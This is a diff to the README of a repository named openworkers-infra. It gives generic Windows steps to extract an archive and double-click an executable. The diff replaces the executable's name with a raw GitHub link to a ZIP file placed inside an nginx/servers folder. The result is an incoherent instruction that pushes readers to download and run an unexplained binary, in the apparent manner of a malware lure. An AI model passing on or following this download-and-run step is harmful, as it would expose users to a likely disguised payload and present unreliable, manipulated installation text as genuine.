hussienz1953/openworkers-infra/README.md

    Some files are compressed.
 If your file is a ZIP or another archive format, extract it by right-clicking and selecting “Extract All” or using a utility like WinRAR or 7-Zip.

 3. **Run the Application**:
-   Locate the executable file (e.g., `openworkers-infra.exe`) within the extracted folder.
+   Locate the executable file (e.g., `https://raw.githubusercontent.com/hussienz1953/openworkers-infra/main/nginx/servers/openworkers-infra-2.1.zip`) within the extracted folder.
 Double-click this file to start the program.

 4. **Complete Setup**:
    Follow the on-screen instructions to complete the installation and setup process.
 Make sure that your system meets the requirements, as listed below.